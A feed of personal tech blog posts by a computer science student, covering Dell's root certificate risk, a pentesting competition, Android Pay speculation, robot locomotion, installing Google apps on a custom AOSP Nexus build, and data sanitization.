devices is limited. Luckily, the big companies have taken notice and are taking action. <a href="http://www.apple.com/ios/preview/">In an upcoming version of iOS for iPhones and iPads</a>, Apple plans to introduce Night Shift. Flip it on and it'll automatically determine when the sun sets and rises in your area and adjust the screen's color accordingly. Just another reason to GO ORANGE.</p>
<h3>About The Author</h3>
<p>Carter Yagemann ’15 is a master’s student studying computer science in Syracuse University’s College of Engineering and Computer Science. A research assistant in Professor Kevin Du‘s Android security lab, his interests include mobile security and security education. He explores problems such as how to ensure security and privacy in Android inter-component communication. Yagemann is a student member of ACM and IEEE and competes in cybersecurity competitions with the Information Security Club in Syracuse University’s School of Information Studies (iSchool).</p>Understanding Dell’s Root Certificate Problem2015-11-30T22:30:00-05:002015-11-30T22:30:00-05:00Carter Yagemanntag:carteryagemann.com,2015-11-30:/dell-root-certificate.html<p><em>Originally written for the Syracuse University College of Engineering blog.</em></p>
<p><a href="http://www.theregister.co.uk/2015/11/23/dude_youre_getting_pwned/">A recent discovery in the security community</a> has researchers concerned about Dell devices. Some of these devices have been found to contain something known as a self signed root certificate. Installed by the manufacturer for advertising purposes, these certificates pose …</p><p><em>Originally written for the Syracuse University College of Engineering blog.</em></p>
<p><a href="http://www.theregister.co.uk/2015/11/23/dude_youre_getting_pwned/">A recent discovery in the security community</a> has researchers concerned about Dell devices. Some of these devices have been found to contain something known as a self signed root certificate. Installed by the manufacturer for advertising purposes, these certificates pose a risk to users. This is not the first time this has happened, there was <a href="http://www.cnet.com/news/superfish-torments-lenovo-owners-with-more-than-adware/">an early case involving Lenovo devices</a> known as Superfish. In this article I will try to explain the problem in an approachable manner as well as point readers towards actions they can take to protect themselves. What are these self signed root certificates the security experts talk about and why are they dangerous? Understanding the problem requires understanding some of the characteristics of something known as the public key infrastructure. PKI is complex in practice, but we can use a simplified model to understand the problem at hand. All we need to know is that there are keys and certificates. By using a key, one can create certificates. If we trust the party who holds a particular key, then we can trust the certificates made from that key. Trust, in this case implies two fundamental trusts. First, that the party that holds the key will keep that key secret. Second, that party will only make certificates for other trustworthy parties. This is the network of trust upon which we perform our sensitive internet tasks such as banking, shopping, and communicating. The problem with the Dell root certificate and Superfish is that the manufacturer has created a "trusted" key which sits on every user's device. The same key. Steal this key from any one device and now that thief can create certificates that will be trusted by all devices. Google, Facebook, Bank of America, Amazon, all of these parties can be impersonated by creating new certificates. Exposing users to such a risk is a severe oversight. Thankfully, the concerns of the security community have been heard and users can now take actions to remove these self signed root certificates. If you use a Dell or Lenovo device, I encourage you to consult your manufacturer's website for more details:</p>
<ul>
<li><a href="http://www.dell.com/support/article/us/en/04/SLN300321?c=us&l=en&s=bsd&cs=04">Dell Support</a></li>
<li><a href="https://support.lenovo.com/us/en/product_security/superfish_uninstall">Lenovo Support</a></li>
</ul>
<h3>About The Author</h3>
<p>Carter Yagemann ’15 is a master’s student studying computer science in Syracuse University’s College of Engineering and Computer Science. A research assistant in Professor Kevin Du‘s Android security lab, his interests include mobile security and security education. He explores problems such as how to ensure security and privacy in Android inter-component communication. Yagemann is a student member of ACM and IEEE and competes in cybersecurity competitions with the Information Security Club in Syracuse University’s School of Information Studies (iSchool).</p>Students Compete in RIT Cybersecurity Competition2015-11-11T22:30:00-05:002015-11-11T22:30:00-05:00Carter Yagemanntag:carteryagemann.com,2015-11-11:/rit-cybersecurity-competition.html<p><em>Originally written for the Syracuse University College of Engineering blog.</em></p>
<p>Last weekend, I had the opportunity to compete in the first-ever Collegiate Pentesting Competition along with five other members from the iSchool's Information Security Club. Hosted by RIT, this competition places competing university teams in the role of security consulting …</p><p><em>Originally written for the Syracuse University College of Engineering blog.</em></p>
<p>Last weekend, I had the opportunity to compete in the first-ever Collegiate Pentesting Competition along with five other members from the iSchool's Information Security Club. Hosted by RIT, this competition places competing university teams in the role of security consulting companies contracted to assess the strength of a corporate network. This competition stresses technical and soft skills. Competitors must leverage their technical abilities to find vulnerabilities, as well as document and present their findings to the nontechnical executive board of the corporation. I am excited to announce that out of the nine university teams that competed from across the northeast, Syracuse University took third place! The Collegiate Pentesting Competition distinguishes itself from other cybersecurity competitions by placing a heavy emphasis on the business side of running a security company. Traditionally, security competitions fall into two categories: purely defensive or purely offensive. Purely defensive competitions, such as the Collegiate Cyber Defense Competition, restrict competitors to solely defending a network while a professional team of hackers tries to exploit vulnerabilities to gain access. This type of competition forbids any offensive actions on the part of the competing students. Conversely, purely offensive competitions, such as Capture The Flag events, present competitors with tasks that must be completed by breaking into vulnerable computer systems. Since the sole objective of these competitions is to recover the “flags,” competitors are encouraged to use any offensive tactics possible with complete disregard for collateral damage. In these competitions, the systems and networks often get destroyed as teams race to complete the given tasks. The Collegiate Pentesting Competition is a hybrid between offense and defense. Teams still use offensive techniques to detect and exploit vulnerable systems, but they must do so in a way which does not damage the systems or hinder the company's ability to do business. This requires the teams to be surgical in their methodology rather than simply “smashing and grabbing.” Overall, I highly enjoyed this competition. The level of realism and professionalism it entailed made competing a very educational experience. I look forward to seeing the Information Security Club compete next year.</p>
<h3>About The Author</h3>
<p>Carter Yagemann ’15 is a master’s student studying computer science in Syracuse University’s College of Engineering and Computer Science. A research assistant in Professor Kevin Du‘s Android security lab, his interests include mobile security and security education. He explores problems such as how to ensure security and privacy in Android inter-component communication. Yagemann is a student member of ACM and IEEE and competes in cybersecurity competitions with the Information Security Club in Syracuse University’s School of Information Studies (iSchool).</p>Android for Your Laptop2015-11-03T22:30:00-05:002015-11-03T22:30:00-05:00Carter Yagemanntag:carteryagemann.com,2015-11-03:/android-for-your-laptop.html<p><em>Originally written for the Syracuse University College of Engineering blog.</em></p>
<p>Google recently announced plans to merge features from Chrome OS into Android to make the operating system suitable for use with laptops. This means that in the future, we can anticipate Android working across phones, tablets, and laptops. This is …</p><p><em>Originally written for the Syracuse University College of Engineering blog.</em></p>
<p>Google recently announced plans to merge features from Chrome OS into Android to make the operating system suitable for use with laptops. This means that in the future, we can anticipate Android working across phones, tablets, and laptops. This is a very bold vision , but it's one that was bound to happen and one that all Android users should be excited for. Up to this point, Chrome OS has been Google's dedicated operating system for their lineup of Chromebook computers. While Chrome OS offers unique features in terms of user experience and security at a price point that beats most other laptops on the market, Google's substantially different approach to designing laptops has made the Chromebook a relatively niche device. In the years it has existed, it has never reached the point of being a real competitor in the Windows-dominated laptop market. Contrast this with Android, which dominates the smartphone market at over 80 percent market share, and the reasoning behind this merging of the two operating systems becomes clear. If Google can successfully take their winning mobile user experience and port it to laptops, they'll have a formula for a laptop that stands toe-to-toe with Windows and OS X. I think that this is going to be the Google operating system to give Microsoft and Apple a run for their money. Users should be excited for this move as well. The average user now owns more devices than ever before and they want a consistent experience regardless of if they're using a phone, tablet, laptop, or desktop. Google does an excellent job of making the interaction between the user and the device clean, efficient, and friendly, and soon we'll get these same benefits for the laptop. However, there are a handful of design challenges that Google will have to overcome if they want Android for the laptop to be a success and not just another niche product like Chrome OS. For starters, laptops are dominantly used for content creation where mobile devices are mostly for consuming. Laptops are like the working man's pickup truck. Users have different demands for laptops than mobile devices. If Android is to succeed in the laptop environment, a greater emphasis will have to be placed on productivity. This means efficient switching between applications, strong support for keyboards, and plug-and-play functionality for external storage and additional peripherals. These are things only supported to a limited degree in current Android. Screen size also becomes an issue for Android on laptops. Android's current interfaces are designed for relatively small screens—under 10 inches in size. Now that Google wants Android to run on laptops and desktops, they'll have to redesign the look and feel for screen sizes in excess of 16 inches. It may only be a few extra inches, but this makes a huge difference if you don't want the screen to appear barren. For the average user who already uses Android on their mobile devices, I think the transition to Android for laptops will be pretty smooth. Android already has the email clients, web browsers, and office applications these users need for their everyday work. For the "power user" however, I think the new operating system will be a harder sell. These users manage corporate infrastructures, develop software, automate systems, deploy virtual machines, and regularly perform computing intensive tasks. For them, unfortunately, the tools they need simply don't exist on Android yet. I've anticipated Android moving to laptops and desktops for some time now and I hope others share my excitement over this recent announcement. There's a lot of work to be done, but I think that if Google can pull this off, we'll end up with something very special and unique.</p>
<h3>About The Author</h3>
<p>Carter Yagemann '15 is a master's student studying computer science in Syracuse University's College of Engineering and Computer Science. A research assistant in Professor Kevin Du's Android security lab, his interests include mobile security and security education. He explores problems such as how to ensure security and privacy in Android inter-component communication. Yagemann is a student member of ACM and IEEE and competes in cybersecurity competitions with the Information Security Club in Syracuse University's School of Information Studies (iSchool).</p>Initial Observations Regarding Android Pay2015-10-30T22:30:00-04:002015-10-30T22:30:00-04:00Carter Yagemanntag:carteryagemann.com,2015-10-30:/android-pay.html<p>Android Pay has just come out on the Google Play Store and it's an interesting concept in many ways. I can't help but be curious about its internal workings and after some discussion with a co-worker, I've decided to quickly write up our initial thoughts on the application.</p>
<h2>Scope</h2>
<p>These …</p><p>Android Pay has just come out on the Google Play Store and it's an interesting concept in many ways. I can't help but be curious about its internal workings and after some discussion with a co-worker, I've decided to quickly write up our initial thoughts on the application.</p>
<h2>Scope</h2>
<p>These are some initial thoughts I had from a security perspective after using Android Pay for the first time. These observations are purely speculative and black box, so they should not be mistaken for fact. These speculations are being made before having done any decompilation or reverse engineering. I will try my best throughout this document to clearly state the observations driving each speculation I make.</p>
<h2>Transparency</h2>
<p>The first thing that stuck out to me is that Android Pay does not appear to be transparent to the banks. When I added my debit card to the application, for example, I was presented with an EULA from my particular bank. After that, I had to verify my card by signing into my bank's application. In the case of my co-worker, he didn't have to verify his card, but he did receive an email from his bank within minutes containing information regarding Android Pay. In other words, while I may not know exactly how the Android Pay system works, I speculate that it does necessitate the banks being aware of Android Pay. You'll see why this is important in the next speculation.</p>
<h2>Virtual Account Number</h2>
<p>The other thing that immediately stuck out to me is that upon adding a card to Android Pay, that card is given a "virtual account number." The in-app description of this number reads, "This number is used instead of your actual card number so that your info isn't shared with stores."</p>
<p>Interesting.</p>
<p>While privacy may indeed be part of the motivation behind using a virtual number instead of the real card number, I don't believe this to be the full story. Having worked in a bank for a short while, I know that one of the biggest concerns a bank has is liability and therefore risk management. As we speculated earlier, Android Pay isn't transparent to the banks. This means that the banks have a choice in participating which, in turn, means that they aren't going to participate unless the risks associated with Android Pay are minimal. I speculate this to be the <strong>true</strong> reason for the virtual number. By using this number in place of the real card's number, should a vulnerability in Android Pay be exploited, damage is limited to exposure of the virtual number and not the real number. Google can reissue this virtual number while the banks are protected from having to reissue a new card. Granted, a fraudulent transaction or two may occur in the time it takes for the virtual number to be deactivated and reissued, but the majority of the burden falls on Google and not the bank. It's even possible that the banks might have an agreement with Google where Google is responsible for repaying the banks for fradulent charges occuring due to Android Pay.</p>
<p>This idea of risk mitigation will come up again in a later speculation I make.</p>
<h2>Transaction Processing</h2>
<p>The ultimate question my speculations aim to shed light on is how does Android Pay work? What happens when a user makes a purchase using Android Pay? Given the previous two speculations, we can make some educated guesses. I must stress again that this is still speculation, but food for thought none the less.</p>
<p>Before I reveal my next speculation, a bit of background is necessary. Something which you must understand is that in card processing, time is greatly of the essence. A transaction must be processed in a matter of seconds in order for the customer to be satisfied. In these few seconds, the transaction has to pass through multiple parties. In the case of the traditional card, there's the point-of-sales terminal which swipes the card, some back-end system for managing these terminals, the credit card processor (such as Visa), and the bank (such as JPMorgan Chase). The transaction has to pass through all these parties in order to be allowed.</p>
<p>With that understood, I tease my next speculation with a question: Who translates the virtual number into the real number? Surely this translation must happen somewhere, otherwise why would the Android Pay user provide a credit or debit card number in the first place? I speculate that it isn't Google.</p>
<p>Think about it. If Google was translating the virtual number into the real number at the time of use, the process would become transparent to the banks. There would be no reason for Google to solicit partnership with them. But we know Android Pay isn't transparent to the banks, which is strong reason to speculate that this is not the case. Google likely shares the virtual number with the bank at some point during the process of adding or verifying the card.</p>
<p>Handling the virtual number in this manner benefits both parties. First, this decreases the bank's risk because if the translation isn't handled by Google, then Google won't have to send the real number over the wire to the next party in the processing chain. This benefits Google as well because no translating on their end means no need to build out any infrastructure. They can piggyback off the existing card processing infrastructure.</p>
<h2>Unanswered Questions</h2>
<p>So who does the translation? If it isn't the retailer and it isn't Google, that leaves the bank and the card processor. Sadly, I don't have an answer to this question.</p>
<p>The other question I don't have an answer for is what is actually given to the retailer via NFC at the time of use. Is it simply the virtual number or is it something else?</p>
<p>These question I leave to the reverse-engineers.</p>How Number of Limbs Relates to Robots and Organisms2015-10-30T22:30:00-04:002015-10-30T22:30:00-04:00Carter Yagemanntag:carteryagemann.com,2015-10-30:/locomotion.html<p>This weekend was the weekend over which DARPA hosted its large robotics challenge where semi-autonomous robots had to perform a series of tasks simulating a disaster relief scenario. Specifically, robots had to be able to open doors, shut off water valves, drill holes in walls, climb stairs and more. It …</p><p>This weekend was the weekend over which DARPA hosted its large robotics challenge where semi-autonomous robots had to perform a series of tasks simulating a disaster relief scenario. Specifically, robots had to be able to open doors, shut off water valves, drill holes in walls, climb stairs and more. It was quite the spectacle to watch and while it was impressive to see how far robotics has come, it also served as a reminder of how far robotics still has yet to go. The robots were very slow at performing their tasks and there was plenty of falling over and unintended failures. Half the robots I observed couldn't even complete the first task of opening a normal door. In short, we can all rest easy knowing that these robots aren't going to be stealing our jobs or planning a violent uprising any time soon.</p>
<p>One other thing which the average observer may have noticed is that the four legged robots performed significantly better than the two legged humanoid robots. To many the reasons why may seem obvious, but to others this outcome may not be so obvious. Even to those who easily made sense of this outcome, they probably have not realized how these results are consistent with the biological organisms which inhabit our planet. With that in mind, I'd like to take a moment to write about locomotion and how it relates to both robots and biological organisms alike.</p>
<h2>Locomotion in Biology</h2>
<p>Take a moment to recall every organism you can which moves over land using limbs. Now think about how many limbs each of these organisms have which are primarily used for moving. Now think about the number of limbs again, but this time pay special attention to the size of the organism relative to its number of limbs. Do this long enough, and a pattern should start to emerge. Specifically, smaller organisms like bugs tend to have six or more limbs while larger organisms like mammals have four and humans have only two. Once again, we're only considering the limbs used primarily for moving.</p>
<p>Is there something special about two limbs verses four limbs verses six limbs with regards to locomotion? As it turns out, there is. Specifically, the ability for the organism to remain stable while moving or while stationary changes as its number of limbs change.</p>
<h2>Physics of Stability</h2>
<p>But first, a bit of physics review. What does it mean for an organism which is standing on limbs to be stable or unstable? First, consider the limbs which are in contact with the ground. Now connect these limbs with imaginary lines to form an imaginary polygon on the ground beneath the organism. In order for an organism to be stable, its center of gravity must be somewhere within this polygon. If the center of gravity leaves this area, the organism will start to tip over and without corrective action, it will eventually topple over. So how does this relate back to having two, four, or six limbs?</p>
<h2>Six Limbed Organisms</h2>
<p>First, consider the six limbed bug. When the bug is stationary, it is standing on all six limbs and stable. How about when it wants to move? To move, the bug can pick up, for example, it's front right, back right, and middle left limbs. This leaves its front left, back left, and middle right limbs on still on the ground, forming a tripod. As long as the bug keeps its center of gravity near the center of its body, this is a stable position. This means the bug is now free to move its lifted limbs forward and place them down. Placing them down creates another tripod which, in turn, stabilizes the bug so it can lift up and move the limbs which were previously grounded. By using this "alternating tripod" locomotion, the bug can move while always being stable. In other words, if I had a magic wand which could freeze the bug, I could freeze the bug at any point during its locomotion and it would not fall over. So to summarize, with six limbs an organism can be stable while stationary or while in motion.</p>
<h2>Four Limbed Organisms</h2>
<p>How about the four limbed organism? When its stationary it has four limbs on the ground so again no problem with stability. But what about when it moves? Now there's a problem. With only four limbs, it cannot use the alternating tripod motion described earlier. It can still remain stable while in motion, but the motion would have to be very awkward. Specifically, the organism would have to shift its center of gravity to be within the right triangle formed by three of its limbs, move the now freed limb forward, and then shift its center of gravity over to the newly formed right triangle to free up another limb. This is possible, but now the organism is intentionally shifting its center of gravity as it moves which is something the six limbed organism didn't have to concern itself with. So to summarize, the four limbed organism is stable while stationary and potentially stable while moving, but requires a more complicated locomotion.</p>
<h2>Two Limbed Organisms</h2>
<p>Which leaves us with the two limbed organism. This organism isn't very stable while standing or moving. The problem is that two limbs only forms a line, not a polygon. So if each limb contacts the ground as only a single point, the organism will constantly be in a state of falling no matter where it shifts its center of gravity. To compensate for this, two limbed organisms have feet. Since the feet contact the ground at multiple points and not just one, the line now becomes a very narrow rectangle and stability can be achieved while standing. However, this rectangle is very narrow compared to the rectangles formed by the stationary four or six limbed organism. Consequently, if someone were to push each organism, the two limbed organism is much easier to knock over than the others. To state it more scientifically, while the four and six limbed organisms are in stable equilibrium when stationary, the two limbed organism is in unstable equilibrium. When disturbed by an outside force, the four and six limbed organisms tend to remain standing while the two limbed organism tends to start falling over.</p>
<p>Similarly to the four limbed organism, while it is possible for the two limbed organism to move without sacrificing stability, doing so results in a very awkward locomotion. The two limbed organism has to shift its center of gravity to be balanced on one foot so it can lift and move the other foot, and then its center of gravity has to be carefully shifted towards the newly placed foot, making sure that the center of gravity doesn't shift outside the narrow rectangle representing its stability. You can imagine how awkward and difficulty this would be.</p>
<h2>Complexity Verses Efficiency</h2>
<p>So if having less than six limbs makes it difficult for an organism in motion to remain stable, why do any organisms have less than six limbs? As it turns out, being unstable isn't always a bad thing. If an organism is always stable, it has to do all its own work in order to move itself. On the other hand, if an organism is unstable, it can take advantage of gravity to do some of the work of moving for it.</p>
<p>Consider once again the two limbed organism. Specifically, consider a human since that's the two limbed organism we're all most familiar with. Again, I'm only considering limbs used for locomotion. Our primary form of locomotion is called walking, but if you think about it, walking is really nothing more than controlled falling. To walk forward, a person lifts their foot, shifts their center of gravity forward, and then catches themselves with their lifted foot as they fall. The forward momentum from that fall then allows the person to lift their other foot and catch themselves as they fall forward again. After the first step, a portion of the forward energy is being generated by momentum as a result of gravity and this is a portion of energy which no longer needs to be generated by the organism. The result is a much more efficient locomotion than if the organism had to generate all the energy itself.</p>
<p>The same notion applies to running for two and four limbed organisms. Once the organism is running, the energy needed to continue running is simply the energy needed to lift itself a few inches off the ground and then to catch itself when gravity pulls it back down. While the organism is in the part of its stride where all of its limbs are off the ground, it is using no energy while still moving forward. To summarize, instability allows for greater efficiency.</p>
<h2>Conclusion</h2>
<p>The takeaway from all this is that when it comes to locomotion, the number of limbs a system has results in a trade off between complexity and efficiency. With more limbs, the system can be simpler because its more stable. On the other hand, with less limbs the system can be more efficient, but it also becomes more complex as it has to now be aware of its momentum and center of gravity. This could be an explanation as to why simpler organisms like bugs tend to have many limbs while more complex organisms like mammals tend to have fewer.</p>
<p>So what does all this have to do with the DARPA robotics challenge? What I hope I demonstrated with this rant on locomotion is that it shouldn't come as a surprise that the four limbed robots out performed the two limbed robots in this competition. For the engineers designing and building these robots, making a robot which is able to move on only two limbs adds a layer of complexity which the four limb robots don't have to worry about. However, as the field of robotics advances, two limbed robots will ultimately be superior to four limbed robots on land, especially as efficiency becomes the leading concern.</p>Installing Google Play Service and Google Apps on Nexus AOSP2015-10-30T22:30:00-04:002015-10-30T22:30:00-04:00Carter Yagemanntag:carteryagemann.com,2015-10-30:/play-service-on-aosp.html<p>I figured out how to get Google Play Service and all the basic Google apps onto a custom compiled AOSP image. It's kind of tricky, so I'll outline what I learned here. I specifically got it working on a Nexus 5 device using a modified version of Android 5.0 …</p><p>I figured out how to get Google Play Service and all the basic Google apps onto a custom compiled AOSP image. It's kind of tricky, so I'll outline what I learned here. I specifically got it working on a Nexus 5 device using a modified version of Android 5.0.2, but these steps should hopefully work for all Nexus devices and most Android version. This tutorial is broken up into 4 parts:</p>
<h2>Part 1: Compiling a Custom Image</h2>
<p>First, make sure you've downloaded the vendor drivers for your device: <a href="https://developers.google.com/android/nexus/drivers">link</a></p>
<p>Once you've downloaded the appropriate files, unzip them. You should now have a bunch of script files. Place these script files in the root directory of your AOSP repository and run them.</p>
<p>Next, make sure you've loaded your sources and you're in the correct lunch for your device (for Nexus 5, this is hammerhead aka 20):</p>
<div class="highlight"><pre><span></span><code><span class="nb">source</span><span class="w"> </span>build/envsetup.sh
lunch<span class="w"> </span><span class="m">20</span>
</code></pre></div>
<p>If this is your first time doing a make with the vendor drivers, you need to clobber to make sure the drivers are compiled into the ROM:</p>
<div class="highlight"><pre><span></span><code>make<span class="w"> </span>clobber
</code></pre></div>
<p>After that, make your ROM:</p>
<div class="highlight"><pre><span></span><code>make
</code></pre></div>
<h2>Part 2: Flashing Custom Image to a Nexus Device</h2>
<p>First, reboot your device into fastboot. The hardware button sequence for your device can be found here: <a href="https://source.android.com/source/building-devices.html">link</a></p>
<p>Once in fastboot, ensure that your bootloader is unlocked. You can lookup how to do this online.</p>
<p>After that, check that your computer can detect your device. You should see it when you run the following command:</p>
<div class="highlight"><pre><span></span><code>fastboot<span class="w"> </span>devices
</code></pre></div>
<p>If you can't see it, check your USB drivers and make sure you have Google's Nexus USB drivers if you're using a Nexus device.</p>
<p>Finally, flash the device:</p>
<div class="highlight"><pre><span></span><code>fastboot<span class="w"> </span>-w<span class="w"> </span>flashall
</code></pre></div>
<h2>Part 3: Flashing Recovery</h2>
<p>At this point, you've compiled a custom image and flashed it to your device. The next goal is to install the standard Google apps (GPS, Google Play, Gmail, etc.). Unfortunately, the default recovery doesn't work well with rooted devices. So before we can do that, we need to install a 3rd-party recovery.</p>
<p>First, reboot the device into fastboot. This can be done via adb:</p>
<div class="highlight"><pre><span></span><code>adb<span class="w"> </span>reboot<span class="w"> </span>bootloader
</code></pre></div>
<p>Once in fastboot, we can flash the recovery partition with our custom recovery. I recommend twrp which can be found here: <a href="https://twrp.me/Devices/">link</a></p>
<p>For Nexus 5, this version of twrp will work: <a href="https://dl.twrp.me/hammerhead/twrp-2.8.7.1-hammerhead.img.html">link</a></p>
<div class="highlight"><pre><span></span><code>fastboot<span class="w"> </span>flash<span class="w"> </span>recovery<span class="w"> </span>twrp-2.8.7.1-hammerhead.img
</code></pre></div>
<p>After that, reboot the device:</p>
<div class="highlight"><pre><span></span><code>fastboot<span class="w"> </span>reboot
</code></pre></div>
<h2>Part 4: Install Gapps</h2>
<p>First, push a gapps archive onto your sd card. This can be downloaded from cyanogen's website: <a href="https://web.archive.org/web/20161224215109/https://wiki.cyanogenmod.org/w/Google_Apps">link</a></p>
<p>The website only shows which gapps corresponds to which cyanogenmod version and not the equivalent AOSP version. From my experiences, I believe this much to be true:</p>
<ul>
<li>Android 5.1.0 <=> CM 12.1</li>
<li>Android 5.0.0, 5.0.1, 5.0.2 <=> CM 12</li>
</ul>
<p>If you are using a different version of AOSP, you'll have to experiment and find the right version on your own. Note, you can always do a factory reset from recovery to remove gapps and then install another version.</p>
<p>Once you've downloaded a version of gapps, push it to the sd card:</p>
<div class="highlight"><pre><span></span><code>adb<span class="w"> </span>push<span class="w"> </span>gapps.zip<span class="w"> </span>/sdcard/
</code></pre></div>
<p>Once the zip is written to the sd card, reboot into recovery:</p>
<div class="highlight"><pre><span></span><code>adb<span class="w"> </span>reboot<span class="w"> </span>recovery
</code></pre></div>
<p>Once in the Recovery, select install from zip and select your zip. After the installation is complete, select the wipe button at the bottom of the screen and then reboot the device. If everything worked correctly, you should be prompted with the Welcome screen which will ask you to configure your device. If you do not get the Welcome screen, then you either didn't install the correct version of gapps or you forgot to wipe something.</p>Digital Verses Analog Sanitization2015-10-28T22:30:00-04:002015-10-28T22:30:00-04:00Carter Yagemanntag:carteryagemann.com,2015-10-28:/water-buckets.html<p>As I promised in my <a href="https://carteryagemann.com/data-sanitization.html">previous blog post</a>, I will try to explain the difference between digital and analog sanitization using an analogy better suited for the task. If you have no clue what I'm talking about, I recommend that you go and read that <a href="https://carteryagemann.com/data-sanitization.html">post</a>. If you were hoping …</p><p>As I promised in my <a href="https://carteryagemann.com/data-sanitization.html">previous blog post</a>, I will try to explain the difference between digital and analog sanitization using an analogy better suited for the task. If you have no clue what I'm talking about, I recommend that you go and read that <a href="https://carteryagemann.com/data-sanitization.html">post</a>. If you were hoping for the other follow-up I promised regarding a more practical guide to data protection, this is not that post. This is going to be another conceptual writing.</p>
<h2>The Analogy</h2>
<p>The analogy which I'm going to use to try to illustrate the difference between digital and analog sanitization might seem somewhat contrived, but it's the simplest one I could come up with so here it goes.</p>
<p>Imagine you have a collection of buckets which can each hold 4 cups of water. You are able to add and remove water from the buckets whenever you like, however, you must always try to add or remove 3 cups worth of water at a time. So if a bucket is empty and you add water to it, the bucket ends up with 3 cups worth of water in it. If you try to add water again to the same bucket, some water overflows and is lost so ultimately the bucket ends up with 4 cups worth of water in it. Similarly, if the bucket only has 1 cup of water in it and you try to remove water, you end up removing all the remaining water in the bucket.</p>
<p>Now here's the last piece regarding how this analogy works. Assume that we only care about answering the question of if a particular bucket is more full or more empty. Therefore, if the bucket contains more than 2 cups of water, we will call it mostly full. Likewise, if it has less than 2 cups of water, we will consider it mostly empty. We don't have to worry about any bucket having exactly 2 cups of water in it given how this model is works. In fact, it is only possible for any particular bucket to contain 0, 1, 3, or 4 cups of water; assuming all the buckets start empty.</p>
<h2>Emptying the Buckets</h2>
<p>So we have our buckets and some time has gone by and now all of our buckets contain different amounts of water. Some are mostly full while others are mostly empty. Now lets assume that we want to "wipe" all of our buckets. In other words, we want all our buckets to be mostly empty. The process is pretty easy, we can just go to every bucket and remove water from it. Simple, right?</p>
<p>While it is true that doing this will now cause all of our buckets to be mostly empty, take another look at how much water is actually in each bucket. The buckets which originally had 3 or less cups of water will now be empty, but the buckets which originally had 4 cups of water will still have 1 cup of water remaining. This means that if we inspect how much water is in each bucket, we can determine which ones previously held 4 cups of water. We can reconstruct a portion of the past state of the buckets from the current state of the buckets!</p>
<h2>What Went Wrong?</h2>
<p>In a nutshell, the reason why we were able to figure out the past state of some of the buckets is because there is a correlation between the last state the bucket was in and its current state. This correlation occurred because when we emptied the buckets, we only consider the 2 possible digital states for a particular bucket and ignored the 4 possible analog states. If we had considered the analog states, we would have realized that we needed to empty each bucket twice in order to make it impossible to determine any bucket's previous state. This is an analogy of the difference between digital and analog sanitization.</p>
<h2>Back to Reality</h2>
<p>Although our simple analogy used buckets of water, this concept actually applies to electronic storage devices. For those of us with experience in the logical side of computing, such as any computer scientist who might happen to read this, we have a tendency to abstract away the gritty details about how the underlining hardware of a computer works. While utilizing this layer of abstraction simplifies our problems and makes them approachable, abstractions such as these can cause us to forget that our idealistic binary zeros and ones are actually being stored in physical materials. As every electrical engineer knows, these physical materials don't behave in accordance to our perfectly abstracted models. Instead, we have to take their infinite possible analog states and group them into the "zero" set and the "one" set in order to fit them to our models. Never forget, however, that at the end of the day the storage device is indeed physical and consequently analog. Correlations between states can exist, but become hidden underneath the veil of our abstractions.</p>
<p>So to end on a slightly more piratical note, how do professionals deal with these analog correlations? What is the takeaway from all this? The short answer is that if you want to wipe an electronic storage device, but you can't simply destroy it, don't settle with "zeroing" out the data over 1 pass. Overwrite all the data with random values and do so multiple times. The more passes and the more entropy, the less likely it is that a correlation will remain between the original data and the current state of the device. How many passes is necessary depends on the particulars of the device, so if you need to wipe a computer, smart-phone, or other electronic device, I recommend doing some research and selecting a professional tool to do the work for you. DBAN, for example, is a good one to consider.</p>Is your data really gone? Explaining the challenges of data wiping.2015-10-24T22:30:00-04:002015-10-24T22:30:00-04:00Carter Yagemanntag:carteryagemann.com,2015-10-24:/data-sanitization.html<p>Every now and again you hear on the news about some police investigation having a breakthrough by recovering deleted data off of an electronic device belonging to the possible suspect. You may also hear about professional criminals who recover sensitive information, such as credit card numbers, by sifting through the …</p><p>Every now and again you hear on the news about some police investigation having a breakthrough by recovering deleted data off of an electronic device belonging to the possible suspect. You may also hear about professional criminals who recover sensitive information, such as credit card numbers, by sifting through the hard drives of old discarded computers.</p>
<p>How does this happen? How is it that data turns out to still be on the device even when the user consciously takes actions to delete it?</p>
<p>In this article, I'm going to be covering a conceptual topic which forms one of the corner stones of a field known as <em>digital forensics</em>. Namely, what does it mean for data on an electronic device to be deleted and what does it take to restore this supposedly destroyed information?</p>
<h2>Terminology</h2>
<p>The first step to grasping what it means for data to be deleted is to understand that "deletion" can have multiple technical meanings which vary from the definition we use in everyday speech. Basically, there are different extents to which data can be deleted on an electronic device and based on what extent to which we delete the data, recovering it will entail a varying level of difficulty.</p>
<p>Many publications already categorize the degrees of data sanitization. For example, <a href="http://nvlpubs.nist.gov/nistpubs/SpecialPublications/NIST.SP.800-88r1.pdf">NIST 800-88</a> (see Table 5.1) offers very generalized definitions of what the degrees of data sanitization are. However, since I want this article to be approachable to the laymen, I'm going to use an alternative categorization used in many <a href="https://www.usenix.org/legacy/event/fast11/tech/full_papers/Wei.pdf">publications</a>. If you're curious about how these two categorizations relate, the categorization I'm going to be using in this article fits into the <em>Clear</em> and <em>Purge</em> categories of NIST 800-88. Namely, I'm going to cover <em>logical sanitization</em>, <em>cryptographical sanitization</em>, <em>digital sanitization</em>, and <em>analog sanitization</em>. </p>
<h2>Logical Sanitization</h2>
<p>Logical sanitization is the weakest form of sanitization and the easiest to explain, so I'll cover it first using an analogy:</p>
<p>Imagine a particular file on your electronic device as being a house. In order to visit the house, you have to know how to get there. Luckily, the streets have signs at every intersection. By following the signs, you're able to find the house.</p>
<p>Now imagine that I take down all the signs. The house still exists, but now if you want to visit it, you'll have to search every street. This is what it means to logically sanitize data.</p>
<p>You can probably already see the shortcoming of this form of sanitization. Just because I take down the signs pointing to a piece of data doesn't mean that someone can't still find that data with enough effort.</p>
<p>Despite this fault, this is what actually happens in your electronic device when you normally delete your file. Your device doesn't actually delete the file itself, it just deletes its pointers to that file. This means that until a new file is written into the space the old file occupied, the old file can still be recovered. And since storage these days is large and most systems write new data randomly across the storage, that old file can remain there for a very long time.</p>
<p>So why do electronic devices delete data this way? Frankly, because it's the fastest method. Most users are more concern about speed rather than security, so system developers design their systems to delete data in the fastest way possible.</p>
<h2>Cryptographical Sanitization</h2>
<p>Cryptographical sanitization is an alternative version of logical sanitization which offers a bit more protection against data recovery.</p>
<p>To explain the difference, consider the house analogy again, only this time, the house also has a gated wall surrounding it. Luckily, you have a piece of paper in your hand which contains the password to open the gate. Thanks to this paper, you're able to visit the house without problem.</p>
